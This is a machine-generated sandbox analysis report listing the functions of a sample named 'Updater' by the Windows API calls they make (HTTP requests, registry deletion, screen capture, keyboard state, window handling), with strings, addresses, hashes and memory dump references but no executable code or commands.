InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0074CF97
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0074CFAA
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0074CFBE
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0074CFD7
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0074D01A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0074D030
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074D03B
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0074D06B
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0074D0C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0074D0D7
InternetCloseHandle.WININET(00000000), ref: 0074D0E2

Strings

, xrefs: 0074D05C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 9afa7578d5c8328da71c7be3e65a2f7bfdf83108feffe813b7ff4efdce5c6cbd
Instruction ID: 4daea5a3c6813eae1ca4363ecce472d27478acda856c30ce6494e93cf309e322
Opcode Fuzzy Hash: 9afa7578d5c8328da71c7be3e65a2f7bfdf83108feffe813b7ff4efdce5c6cbd
Instruction Fuzzy Hash: CC514AB1600708BFDB319F61C888ABA7BBDFF08754F00841AF98697660D778DD459BA1

Function 00768F46 Relevance: 22.6, APIs: 15, Instructions: 133filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00768F69
GetFileSize.KERNEL32(00000000,00000000), ref: 00768F80
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00768F8B
CloseHandle.KERNEL32(00000000), ref: 00768F98
GlobalLock.KERNEL32(00000000), ref: 00768FA1
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00768FB0
GlobalUnlock.KERNEL32(00000000), ref: 00768FB9
CloseHandle.KERNEL32(00000000), ref: 00768FC0
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00768FD1
OleLoadPicture.OLEAUT32(?,00000000,00000000,00770BEC,?), ref: 00768FEA
GlobalFree.KERNEL32(00000000), ref: 00768FFA
GetObjectW.GDI32(?,00000018,000000FF), ref: 0076901E
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 0076904E
DeleteObject.GDI32(00000000), ref: 00769076
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0076908C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 89c060647079801dcc13cb20541b9cd2f6b46c794b5bc7a732bc6c4f5a1cf5da
Instruction ID: af9a8566da009b0bc599cb11335b5e097de1ca24a1b76861306d2d3b6a8d7351
Opcode Fuzzy Hash: 89c060647079801dcc13cb20541b9cd2f6b46c794b5bc7a732bc6c4f5a1cf5da
Instruction Fuzzy Hash: 2A412C75A00209EFDB209F65DC48EAA7BBDFF89711F108158F906E7260DB789D01DB64

Function 00742218 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 362timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0074225D
VariantCopy.OLEAUT32(?,?), ref: 00742266
VariantClear.OLEAUT32(?), ref: 00742272
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00742358
VarR8FromDec.OLEAUT32(?,?), ref: 007423B4
VariantInit.OLEAUT32(?), ref: 00742465
SysFreeString.OLEAUT32(?), ref: 007424E9
VariantClear.OLEAUT32(?), ref: 00742535
VariantClear.OLEAUT32(?), ref: 00742544
VariantInit.OLEAUT32(00000000), ref: 00742582

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00742382
Default, xrefs: 0074240C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: a1d7c205b5c85c3b0c419b24bf25c332917852bcfe80d72396eea4ef434af99e
Instruction ID: 09749762ed7c57302477f9cc1be87b0ed044dbdc21a5ed4909e32a2c7e30e713
Opcode Fuzzy Hash: a1d7c205b5c85c3b0c419b24bf25c332917852bcfe80d72396eea4ef434af99e
Instruction Fuzzy Hash: 79D14671A00215DBDB50DFA5C844B79B7B5FF08300F618559F805EB282DBB8ED62DBA1

Function 0075C00E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 0075D398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075C0AE,?,?), ref: 0075D3B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C0F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075C172
RegDeleteValueW.ADVAPI32(?,?), ref: 0075C20A
RegCloseKey.ADVAPI32(?), ref: 0075C27E
RegCloseKey.ADVAPI32(?), ref: 0075C29C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0075C2F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075C304
RegDeleteKeyW.ADVAPI32(?,?), ref: 0075C322
FreeLibrary.KERNEL32(00000000), ref: 0075C383
RegCloseKey.ADVAPI32(00000000), ref: 0075C394

Strings

RegDeleteKeyExW, xrefs: 0075C2FE
advapi32.dll, xrefs: 0075C2ED

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue_wcslen
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2361764144-4033151799
Opcode ID: 1fed754235f92163857d09dac2dfb3468ec61f60031fa2499b6b674f0c0661a7
Instruction ID: 004d196eff5003c7046f239e0df2367cbbd076661299662e3215336aa835be7d
Opcode Fuzzy Hash: 1fed754235f92163857d09dac2dfb3468ec61f60031fa2499b6b674f0c0661a7
Instruction Fuzzy Hash: DCC17D31604341AFD721DF24C494F6ABBE1BF45304F14845DE85A8B3A2CBB9ED4ACB82

Function 00753105 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 170windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00753181
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00753191
CreateCompatibleDC.GDI32(?), ref: 0075319D
SelectObject.GDI32(00000000,?), ref: 007531AA
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00753216
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00753255
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00753279
SelectObject.GDI32(?,?), ref: 00753281
DeleteObject.GDI32(?), ref: 0075328A
DeleteDC.GDI32(?), ref: 00753291
ReleaseDC.USER32(00000000,?), ref: 0075329C

Strings

(, xrefs: 00753236

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 8e7957ee8c216d7cceb03f008f038cadb82eaa08dbc9c6590c93fcba638c001e
Instruction ID: 052b8fbe7a49a0c63205aee3f2f18e1e31cba86c4f1e5f802d41ac808208d463
Opcode Fuzzy Hash: 8e7957ee8c216d7cceb03f008f038cadb82eaa08dbc9c6590c93fcba638c001e
Instruction Fuzzy Hash: 5661E275E00619EFCF14CFA4D884AAEBBB6FF48310F208519E956A7210E7B5AE41CF54

Function 00734700 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0073473E
_wcslen.LIBCMT ref: 00734749
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00734848
GetClassNameW.USER32(?,?,00000400), ref: 007348B9
GetDlgCtrlID.USER32(?), ref: 0073491D
GetWindowRect.USER32(?,?), ref: 00734942
GetParent.USER32(?), ref: 00734960
ScreenToClient.USER32(00000000), ref: 00734967
GetClassNameW.USER32(?,?,00000100), ref: 007349E1
GetWindowTextW.USER32(?,?,00000400), ref: 00734A1D

Strings

%s%u, xrefs: 007347D9

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: d72b179b8a1c22c7b3069b3de6c3c961ce4183950c5b1a517e3cc2497bfc6239
Instruction ID: e88af128c683a97b6832b4bf77b56d0495ad721a6a2fd10fc3a4cfc3ed7cfca9
Opcode Fuzzy Hash: d72b179b8a1c22c7b3069b3de6c3c961ce4183950c5b1a517e3cc2497bfc6239
Instruction Fuzzy Hash: CBA19C712047069FE728DF64C885BABB7E9FF44344F10892DF69A82152EB38BD45CB51

Function 0073CDE4 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(007A2970,000000FF,00000000,00000030), ref: 0073CE60
SetMenuItemInfoW.USER32(007A2970,00000004,00000000,00000030), ref: 0073CE95
Sleep.KERNEL32(000001F4), ref: 0073CEA7
GetMenuItemCount.USER32(?), ref: 0073CEED
GetMenuItemID.USER32(?,00000000), ref: 0073CF0A
GetMenuItemID.USER32(?,-00000001), ref: 0073CF36
GetMenuItemID.USER32(?,?), ref: 0073CF7D
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0073CFC3
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0073CFD8
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0073CFF9

Strings

0, xrefs: 0073CDF1

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 3e825a7426693790bbdbf3781c812bf6ef6941780df1c5359b1bb0cb18397b1a
Instruction ID: 3d2181cbdc562d63c1cbf04c72fdabf4ee930dd788d6eb5c9d02b94f3bc90aaa
Opcode Fuzzy Hash: 3e825a7426693790bbdbf3781c812bf6ef6941780df1c5359b1bb0cb18397b1a
Instruction Fuzzy Hash: 2561A371A0025AAFEF22CF64DD88AFE7BB9EF05304F044059F912A3252D779AD11CB65

Function 0075D5F3 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 105registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0075D623
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0075D64C
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0075D709

Part of subcall function 0075D5F3: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0075D669
Part of subcall function 0075D5F3: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0075D67C
Part of subcall function 0075D5F3: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075D68E
Part of subcall function 0075D5F3: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0075D6C4
Part of subcall function 0075D5F3: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0075D6E7

RegDeleteKeyW.ADVAPI32(?,?), ref: 0075D6B2

Strings

RegDeleteKeyExW, xrefs: 0075D688
advapi32.dll, xrefs: 0075D677

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 5f354aabb40dfb660817b9dfb92f6b2495b507dbc997544401609c3c8df75304
Instruction ID: 51f129b323a5d37fe38d662e661c5ca00cdb28a7d969d80865ed7fd9bcc8d82d
Opcode Fuzzy Hash: 5f354aabb40dfb660817b9dfb92f6b2495b507dbc997544401609c3c8df75304
Instruction Fuzzy Hash: 3A318271E01219BBDB319B91DC88EFFBB7CEF06751F004155F806E2154DAB85E4A9AA0

Function 0074492E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0074494E
_wcslen.LIBCMT ref: 0074497C
CreateDirectoryW.KERNEL32(?,00000000), ref: 007449AD
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007449D2
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00744A5C
CloseHandle.KERNEL32(00000000), ref: 00744A67
RemoveDirectoryW.KERNEL32(?), ref: 00744A70
CloseHandle.KERNEL32(00000000), ref: 00744A7A

Strings

\??\%s, xrefs: 0074496A
\, xrefs: 00744986
:, xrefs: 00744991

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: c63f2e1776c936b44badea8c1fa2a47a43c5d24580d7db24e57c6a8664e706ac
Instruction ID: 429916be139d2428c276a83e82b911893338cd95225a37bc53df672d7d633dc9
Opcode Fuzzy Hash: c63f2e1776c936b44badea8c1fa2a47a43c5d24580d7db24e57c6a8664e706ac
Instruction Fuzzy Hash: 1E31C871A54209ABDB31DFA0DC49FEB37BDFF88740F1081A5F609D2150E77896449B28

Function 0073F51C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0073F521

Part of subcall function 006EFB90: timeGetTime.WINMM(?,?,0073F540), ref: 006EFB94

Sleep.KERNEL32(0000000A), ref: 0073F54D
EnumThreadWindows.USER32(?,Function_0006F4CF,00000000), ref: 0073F571
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0073F593
SetActiveWindow.USER32 ref: 0073F5B2
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0073F5C0
SendMessageW.USER32(00000010,00000000,00000000), ref: 0073F5DF
Sleep.KERNEL32(000000FA), ref: 0073F5EA
IsWindow.USER32 ref: 0073F5F6
EndDialog.USER32(00000000), ref: 0073F607

Strings

BUTTON, xrefs: 0073F585

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: a1068008aa5a7d99932d16a14ef8cf02d67f1e53085be980a5e8a532564f5ece
Instruction ID: 6330f4cfd45405daaea2aa527d5fc4556490e49e65f102215cf9a1446c75356c
Opcode Fuzzy Hash: a1068008aa5a7d99932d16a14ef8cf02d67f1e53085be980a5e8a532564f5ece
Instruction Fuzzy Hash: 4C2180B0A14305EFF7105F35EC89A267B69AB863C4F148224F40682173DBBE8D208A69

Function 0073ADC0 Relevance: 18.2, APIs: 12, Instructions: 196keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0073AE4C
SetKeyboardState.USER32(?), ref: 0073AEB7
GetAsyncKeyState.USER32(000000A0), ref: 0073AED6
GetKeyState.USER32(000000A0), ref: 0073AEED
GetAsyncKeyState.USER32(000000A1), ref: 0073AF1C
GetKeyState.USER32(000000A1), ref: 0073AF2D
GetAsyncKeyState.USER32(00000011), ref: 0073AF59
GetKeyState.USER32(00000011), ref: 0073AF67
GetAsyncKeyState.USER32(00000012), ref: 0073AF90
GetKeyState.USER32(00000012), ref: 0073AF9E
GetAsyncKeyState.USER32(0000005B), ref: 0073AFC7
GetKeyState.USER32(0000005B), ref: 0073AFD5

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d084692bfd87856ce016f326c42d71b58327bf1688c5a651a19e13854c3fd489
Instruction ID: ce6fadd001e90de495210f2bb3fb45a273c1376e204d8e1c2a3ac82789e2c1af
Opcode Fuzzy Hash: d084692bfd87856ce016f326c42d71b58327bf1688c5a651a19e13854c3fd489
Instruction Fuzzy Hash: 08610260A483897AFB35DB7088177EAAFB49F02380F084599C5C25B5C3DA5C9E4CCB63

Function 00736CAD Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00736CC9
GetWindowRect.USER32(00000000,?), ref: 00736CE2
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00736D40
GetDlgItem.USER32(?,00000002), ref: 00736D50
GetWindowRect.USER32(00000000,?), ref: 00736D62
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00736DB6
GetDlgItem.USER32(?,000003E9), ref: 00736DC4
GetWindowRect.USER32(00000000,?), ref: 00736DD6
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00736E18
GetDlgItem.USER32(?,000003EA), ref: 00736E2B
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00736E41
InvalidateRect.USER32(?,00000000,00000001), ref: 00736E4E

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 6cbec6f9d285f59aa78e9d182ff945b0c8ffbd735f8e0f7e109b5d3aab773dbd
Instruction ID: 094f1f7e8c77f9f9e9981d1b428e25d1d81abab7bf0f28187afc22b702d19857
Opcode Fuzzy Hash: 6cbec6f9d285f59aa78e9d182ff945b0c8ffbd735f8e0f7e109b5d3aab773dbd
Instruction Fuzzy Hash: 9D510DB5F10205BFDF18CF68DD85AAEBBB5FB48310F108229F91AE6291D7749D048B64

Function 006E49E2 Relevance: 18.1, APIs: 12, Instructions: 139COMMON

Download Yara Rule

APIs

Part of subcall function 006E4E23: GetWindowLongW.USER32(?,000000EB), ref: 006E4E34

GetSysColor.USER32(0000000F), ref: 006E4A11

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f57cdababe34feb4c115d981855031730293a6aa8c16d9e17891c4d10d6b221f
Instruction ID: 71a0aac9bb6d1a9c9461c47676821edf959c9498dede68f1cad6c4b3e8f27e74
Opcode Fuzzy Hash: f57cdababe34feb4c115d981855031730293a6aa8c16d9e17891c4d10d6b221f
Instruction Fuzzy Hash: B44124315453949FCB309F3DAC48BB93766EB46331F184229F9A3872E9CB758C429B19

Function 007694ED Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B

Part of subcall function 006E4B74: GetCursorPos.USER32(?), ref: 006E4B88
Part of subcall function 006E4B74: ScreenToClient.USER32(00000000,?), ref: 006E4BA5
Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000001), ref: 006E4BCE
Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000002), ref: 006E4BE8

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00769555
ImageList_EndDrag.COMCTL32 ref: 0076955B
ReleaseCapture.USER32 ref: 00769561
SetWindowTextW.USER32(?,00000000), ref: 00769609
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0076961C
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 007696FB

Strings

P3z, xrefs: 0076966C
P3z, xrefs: 007696A7
@GUI_DRAGFILE, xrefs: 00769693
@GUI_DROPID, xrefs: 00769650

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
